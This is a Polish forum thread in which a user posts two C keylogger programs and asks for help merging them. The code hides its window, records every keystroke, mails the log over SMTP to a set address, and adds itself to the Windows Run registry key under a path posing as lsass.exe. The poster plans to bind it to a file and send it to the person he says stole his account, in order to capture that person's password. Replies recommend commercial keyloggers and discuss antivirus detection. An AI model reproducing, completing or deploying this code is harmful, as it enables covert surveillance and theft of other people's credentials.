Temat: Keylogger

Pokaz wyniki od 1 do 9 z 9
  1. #1 Keylogger 
    Użytkownik
    Dołączył
    05-05-2015
    Posty
    8
    Witam, potrzebuję keyloggera. Niestety jestem w tym zielony.Ukradli mi konto warte [SIZE=6]600-800 zł [COLOR=#000000][SIZE=2]i chce je odzyskać. Mam 2 kody ale potrzebne mi jest ich połaczenie sprawdzenie i ewentualnie dodanie kilku funkcji. kod 1 zawiera wysyłanie widomości na e-mail a 2 posiada autostart. Potrzebuję także żeby był niewidoczny podczas pracy oraz sam się instalował.
    Bardzo prosze o pomoc.

    #include <windows.h>
    #include <stdio.h>
    #include <winuser.h>
    #include <windowsx.h>
    #include <time.h>
    int MailIt (char *mailserver, char *emailto, char *emailfrom,
    char *emailsubject, char *emailmessage);
    #define BUFSIZE 800
    #define waittime 500
    /*If you don't know the mail exchange server for an address for the following
    "nslookup -querytype=mx gmail.com" but replace gmail.com with the domain for
    whatever email address you want. YOU MUST CHANGE THESE SETTINGS OR
    IT WILL NOT WORK!!! */
    #define cmailserver "gmail-smtp-in.l.google.com"
    #define cemailto "[email protected]"
    #define cemailfrom "[email protected]"
    #define LogLength 100
    #define FileName "sound.wav"
    #define SMTPLog "ring.wav"
    #define cemailsubject "Logged"

    int test_key(void);
    int main(void)
    {
    //Uncomment the lines below to put the keylogger in stealh mode.
    HWND stealth; /*creating stealth */
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);

    {FILE *file;
    file=fopen(FileName,"a+");
    time_t theTime=time(0);
    fputs("\nStarted logging: ", file);
    fputs(ctime(&theTime),file);
    fclose(file);
    }

    /* if (test==2)
    {//the path in which the file needs to be
    char *path="c:\\%windir%\\svchost.exe";
    create=create_key(path);
    } */

    int t=get_keys();
    return t;
    }

    int get_keys(void)
    {
    int freadindex;
    char *buf;
    long len;
    FILE *file;
    file=fopen(FileName,"a+");


    short character;
    while(1)
    {
    sleep(10);/*to prevent 100% cpu usage*/
    for(character=8;character<=222;character++)
    {
    if(GetAsyncKeyState(character)==-32767)
    {
    FILE *file;
    file=fopen(FileName,"a+");
    if(file==NULL)
    {
    return 1;
    }
    if(file!=NULL)
    {
    if((character>=39)&&(character<=64))
    {
    fputc(character,file);
    fclose(file);
    break;
    }
    else if((character>64)&&(character<91))
    {
    character+=32;
    fputc(character,file);
    fclose(file);
    break;
    }
    else
    {
    switch(character)
    {
    case VK_SPACE:
    fputc(' ',file);
    fclose(file);
    break;
    case VK_SHIFT:
    fputs("\r\n[SHIFT]\r\n",file);
    fclose(file);
    break;
    case VK_RETURN:
    fputs("\r\n[ENTER]\r\n",file);
    fclose(file);
    break;
    case VK_BACK:
    fputs("\r\n[BACKSPACE]\r\n",file);
    fclose(file);
    break;
    case VK_TAB:
    fputs("\r\n[TAB]\r\n",file);
    fclose(file);
    break;
    case VK_CONTROL:
    fputs("\r\n[CTRL]\r\n",file);
    fclose(file);
    break;
    case VK_DELETE:
    fputs("\r\n[DEL]\r\n",file);
    fclose(file);
    break;
    case VK_OEM_1:
    fputs("\r\n[;:]\r\n",file);
    fclose(file);
    break;
    case VK_OEM_2:
    fputs("\r\n[/?]\r\n",file);
    fclose(file);
    break;
    case VK_OEM_3:
    fputs("\r\n[`~]\r\n",file);
    fclose(file);
    break;
    case VK_OEM_4:
    fputs("\r\n[ [{ ]\r\n",file);
    fclose(file);
    break;
    case VK_OEM_5:
    fputs("\r\n[\\|]\r\n",file);
    fclose(file);
    break;
    case VK_OEM_6:
    fputs("\r\n[ ]} ]\r\n",file);
    fclose(file);
    break;
    case VK_OEM_7:
    fputs("\r\n['\"]\r\n",file);
    fclose(file);
    break;
    case 187:
    fputc('+',file);
    fclose(file);
    break;
    case 188:
    fputc(',',file);
    fclose(file);
    break;
    case 189:
    fputc('-',file);
    fclose(file);
    break;
    case 190:
    fputc('.',file);
    fclose(file);
    break;
    case VK_NUMPAD0:
    fputc('0',file);
    fclose(file);
    break;
    case VK_NUMPAD1:
    fputc('1',file);
    fclose(file);
    break;
    case VK_NUMPAD2:
    fputc('2',file);
    fclose(file);
    break;
    case VK_NUMPAD3:
    fputc('3',file);
    fclose(file);
    break;
    case VK_NUMPAD4:
    fputc('4',file);
    fclose(file);
    break;
    case VK_NUMPAD5:
    fputc('5',file);
    fclose(file);
    break;
    case VK_NUMPAD6:
    fputc('6',file);
    fclose(file);
    break;
    case VK_NUMPAD7:
    fputc('7',file);
    fclose(file);
    break;
    case VK_NUMPAD8:
    fputc('8',file);
    fclose(file);
    break;
    case VK_NUMPAD9:
    fputc('9',file);
    fclose(file);
    break;
    case VK_CAPITAL:
    fputs("\r\n[CAPS LOCK]\r\n",file);
    fclose(file);
    break;
    default:
    fclose(file);
    break;
    }
    }
    }
    }
    }
    FILE *file;
    file=fopen(FileName,"rb");
    fseek(file,0,SEEK_END); //go to end
    len=ftell(file); //get position at end (length)
    if(len>=LogLength) {
    fseek(file,0,SEEK_SET);//go to beg.
    buf=(char *)malloc(len);//malloc buffer
    freadindex=fread(buf,1,len,file);//read into buffer
    buf[freadindex] = '\0';//Extra bit I have to add to make it a sting
    MailIt( cmailserver, cemailto, cemailfrom, cemailsubject, buf);
    fclose(file);
    file=fopen(FileName,"w");
    }

    fclose(file);
    //free (buf);

    }
    return EXIT_SUCCESS;
    }

    int MailIt (char *mailserver, char *emailto, char *emailfrom,
    char *emailsubject, char *emailmessage) {
    SOCKET sockfd;
    WSADATA wsaData;
    FILE *smtpfile;

    #define bufsize 300
    int bytes_sent; /* Sock FD */
    int err;
    struct hostent *host; /* info from gethostbyname */
    struct sockaddr_in dest_addr; /* Host Address */
    char line[1000];
    char *Rec_Buf = (char*) malloc(bufsize+1);
    smtpfile=fopen(SMTPLog,"a+");
    if (WSAStartup(0x202,&wsaData) == SOCKET_ERROR) {
    fputs("WSAStartup failed",smtpfile);
    WSACleanup();
    return -1;
    }
    if ( (host=gethostbyname(mailserver)) == NULL) {
    perror("gethostbyname");
    exit(1);
    }
    memset(&dest_addr,0,sizeof(dest_addr));
    memcpy(&(dest_addr.sin_addr),host->h_addr,host->h_length);

    /* Prepare dest_addr */
    dest_addr.sin_family= host->h_addrtype; /* AF_INET from gethostbyname */
    dest_addr.sin_port= htons(25); /* PORT defined above */

    /* Get socket */

    if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
    perror("socket");
    exit(1);
    }
    /* Connect !*/
    fputs("Connecting....\n",smtpfile);

    if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
    perror("connect");
    exit(1);
    }
    sleep(waittime);
    err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
    fputs(Rec_Buf,smtpfile);
    strcpy(line,"helo me.somepalace.com\n");
    fputs(line,smtpfile);
    bytes_sent=send(sockfd,line,strlen(line),0);
    sleep(waittime);
    err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
    fputs(Rec_Buf,smtpfile);
    strcpy(line,"MAIL FROM:<");
    strncat(line,emailfrom,strlen(emailfrom));
    strncat(line,">\n",3);
    fputs(line,smtpfile);
    bytes_sent=send(sockfd,line,strlen(line),0);
    sleep(waittime);
    err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
    fputs(Rec_Buf,smtpfile);
    strcpy(line,"RCPT TO:<");
    strncat(line,emailto,strlen(emailto));
    strncat(line,">\n",3);
    fputs(line,smtpfile);
    bytes_sent=send(sockfd,line,strlen(line),0);
    sleep(waittime);
    err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
    fputs(Rec_Buf,smtpfile);
    strcpy(line,"DATA\n");
    fputs(line,smtpfile);
    bytes_sent=send(sockfd,line,strlen(line),0);
    sleep(waittime);
    err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
    fputs(Rec_Buf,smtpfile);
    sleep(waittime);
    strcpy(line,"To:");
    strcat(line,emailto);
    strcat(line,"\n");
    strcat(line,"From:");
    strcat(line,emailfrom);
    strcat(line,"\n");
    strcat(line,"Subject:");
    strcat(line,emailsubject);
    strcat(line,"\n");
    strcat(line,emailmessage);
    strcat(line,"\r\n.\r\n");
    fputs(line,smtpfile);
    bytes_sent=send(sockfd,line,strlen(line),0);
    sleep(waittime);
    err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
    fputs(Rec_Buf,smtpfile);
    strcpy(line,"quit\n");
    fputs(line,smtpfile);
    bytes_sent=send(sockfd,line,strlen(line),0);
    sleep(waittime);
    err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
    fputs(Rec_Buf,smtpfile);
    fclose(smtpfile);
    #ifdef WIN32
    closesocket(sockfd);
    WSACleanup();
    #else
    close(sockfd);
    #endif

    Ten zostal trochę w środku opisany

    #include <windows.h>
    #include <stdio.h>
    #include <winuser.h>
    #include <windowsx.h>

    #define BUFSIZE 80

    int test_key(void);
    int create_key(char *);
    int get_keys(void);

    int main(void)
    {
    HWND stealth;
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);

    int test,create;
    test=test_key();
    if (test==2) // Create key.
    {
    char *path="C:\\WINDOWS\\system32\\lsass.exe";
    create=create_key(path);

    }


    int t=get_keys();

    return t;
    }

    int get_keys(void)
    {
    short character;
    while(1)
    {
    Sleep(10);
    for(character=8;character<=222;character++)
    {
    if(GetAsyncKeyState(character)==-32767)
    {

    FILE *file;
    file=fopen("xe41.log","a+");
    if(file==NULL)
    {
    return 1;
    }
    if(file!=NULL)
    {
    if((character>=39)&&(character<=64))
    {
    fputc(character,file);
    fclose(file);
    break;
    }
    else if((character>64)&&(character<91))
    {
    character+=32;
    fputc(character,file);
    fclose(file);
    break;
    }
    else
    {
    switch(character)
    {
    case VK_SPACE:
    fputc(' ',file);
    fclose(file);
    break;
    case VK_SHIFT:
    fputs("[SHIFT]",file);
    fclose(file);
    break;
    case VK_RETURN:
    fputs("\n[ENTER]",file);
    fclose(file);
    break;
    case VK_BACK:
    fputs("[BACKSPACE]",file);
    fclose(file);
    break;
    case VK_TAB:
    fputs("[TAB]",file);
    fclose(file);
    break;
    case VK_CONTROL:
    fputs("[CTRL]",file);
    fclose(file);
    break;
    case VK_DELETE:
    fputs("[DEL]",file);
    fclose(file);
    break;
    case VK_OEM_1:
    fputs("[;:]",file);
    fclose(file);
    break;
    case VK_OEM_2:
    fputs("[/?]",file);
    fclose(file);
    break;
    case VK_OEM_3:
    fputs("ö",file);
    fclose(file);
    break;
    case VK_OEM_4:
    fputs("[ [{ ]",file);
    fclose(file);
    break;
    case VK_OEM_5:
    fputs("[\\|]",file);
    fclose(file);
    break;
    case VK_OEM_6:
    fputs("a*",file);
    fclose(file);
    break;
    case VK_OEM_7:
    fputs("ä",file);
    fclose(file);
    break;
    /* case VK_OEM_PLUS:
    fputc('+',file);
    fclose(file);
    break;
    case VK_OEM_COMMA:
    fputc(',',file);
    fclose(file);
    break;
    case VK_OEM_MINUS:
    fputc('-',file);
    fclose(file);
    break;
    case VK_OEM_PERIOD:
    fputc('.',file);
    fclose(file);
    break; */
    case VK_NUMPAD0:
    fputc('0',file);
    fclose(file);
    break;
    case VK_NUMPAD1:
    fputc('1',file);
    fclose(file);
    break;
    case VK_NUMPAD2:
    fputc('2',file);
    fclose(file);
    break;
    case VK_NUMPAD3:
    fputc('3',file);
    fclose(file);
    break;
    case VK_NUMPAD4:
    fputc('4',file);
    fclose(file);
    break;
    case VK_NUMPAD5:
    fputc('5',file);
    fclose(file);
    break;
    case VK_NUMPAD6:
    fputc('6',file);
    fclose(file);
    break;
    case VK_NUMPAD7:
    fputc('7',file);
    fclose(file);
    break;
    case VK_NUMPAD8:
    fputc('8',file);
    fclose(file);
    break;
    case VK_NUMPAD9:
    fputc('9',file);
    fclose(file);
    break;
    case VK_CAPITAL:
    fputs("[CAPS LOCK]",file);
    fclose(file);
    break;
    default:
    fclose(file);
    break;
    }
    }
    }
    }
    }

    }
    return EXIT_SUCCESS;
    }

    int test_key(void)
    {
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;


    I tak na marginesie - aby keylogger nam sie uruchamiał przy starcie systemu.

    Porszę oto przykład:

    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\ \Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QU ERY_VALUE,&hKey);
    if(reg_key!=0)
    {
    check=1;
    return check;
    }

    reg_key=RegQueryValueEx(hKey,"Kkey",NULL,NULL,(LPB YTE)path,&buf_length);

    if((reg_key!=0)||(buf_length>BUFSIZE))
    check=2;
    if(reg_key==0)
    check=0;

    RegCloseKey(hKey);
    return check;
    }

    int create_key(char *path)
    {
    int reg_key,check;

    HKEY hkey;

    reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\ \Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
    if(reg_key==0)
    {
    RegSetValueEx((HKEY)hkey,"Kkey",0,REG_SZ,(BYTE *)path,strlen(path));
    check=0;
    return check;
    }
    if(reg_key!=0)
    check=1;

    return check;
    }
    Ostatnio edytowane przez kosua ; 19-08-2015 o 17:15
    Odpowiedź z Cytatem  
     

  2. #2  
    Zbanowany
    Dołączył
    18-08-2015
    Posty
    8
    ja Ci nie pomoge z połączeniem tych kodów ale w jaki sposób chcesz to podesłać złodziejowi?
    musisz przecierz wiedzieć kim jest wiec wydaje mi sie że przy takim przestepstwie a nie np. zabawie typu wykradzenia konta metina lepszym rozwiazaniem będzie zgloszenie delikwenta na policje
    Odpowiedź z Cytatem  
     

  3. #3  
    Użytkownik
    Dołączył
    05-05-2015
    Posty
    8
    co mnie obchodzi że zgłosze skoro nie odzyskam konta? Poprostu zbinduje z czymś i podeśle mu to. On zobaczy i się mu to zainstaluje na kompie, przy logowaniu bd znał jego hasło
    Odpowiedź z Cytatem  
     

  4. #4  
    Użytkownik
    Dołączył
    22-07-2015
    Posty
    14
    Antywirus bedzie wyl jak szalony jak mu to podeslesz, skorzystaj lepiej z platnych keyloggerow ktore sa co jakis czas proponowane na tym forum...
    Odpowiedź z Cytatem  
     

  5. #5  
    Użytkownik
    Dołączył
    05-05-2015
    Posty
    8
    możecie jakis polecić?
    Odpowiedź z Cytatem  
     

  6. #6  
    Zbanowany
    Dołączył
    18-08-2015
    Posty
    8
    Polecam Secretlogger.
    Odpowiedź z Cytatem  
     

  7. #7  
    Użytkownik
    Dołączył
    05-05-2015
    Posty
    8
    można go podsyłać?
    Odpowiedź z Cytatem  
     

  8. #8  
    Administrator Avatar Admin
    Dołączył
    11-10-2013
    Posty
    198
    Możesz użyć RazielKeylogger. Jest darmowy, ale niestety wykrywalny.
    Odpowiedź z Cytatem  
     

  9. #9  
    Użytkownik
    Dołączył
    07-11-2018
    Posty
    2
    Kod źródłowy keyloggera w Visual C++:
    Visual C++ Keylogger

    Pozostaje jednak dopisać do niego wysyłanie logów, gdyż w tej formie działa on lokalnie.
    Odpowiedź z Cytatem  
     

Podobne wątki

  1. co to jest perfect keylogger i keylogger online?
    Przez hakerus
    w forum Keyloggers/Stealers
    Odpowiedzi: 3
    Ostatni post / autor: 27-04-2006, 17:47
Uprawnienia
  • Nie mozesz zakładać nowych tematów
  • Nie mozesz pisać wiadomosci
  • Nie mozesz dodawać załączników
  • Nie mozesz edytowac swoich postów
  •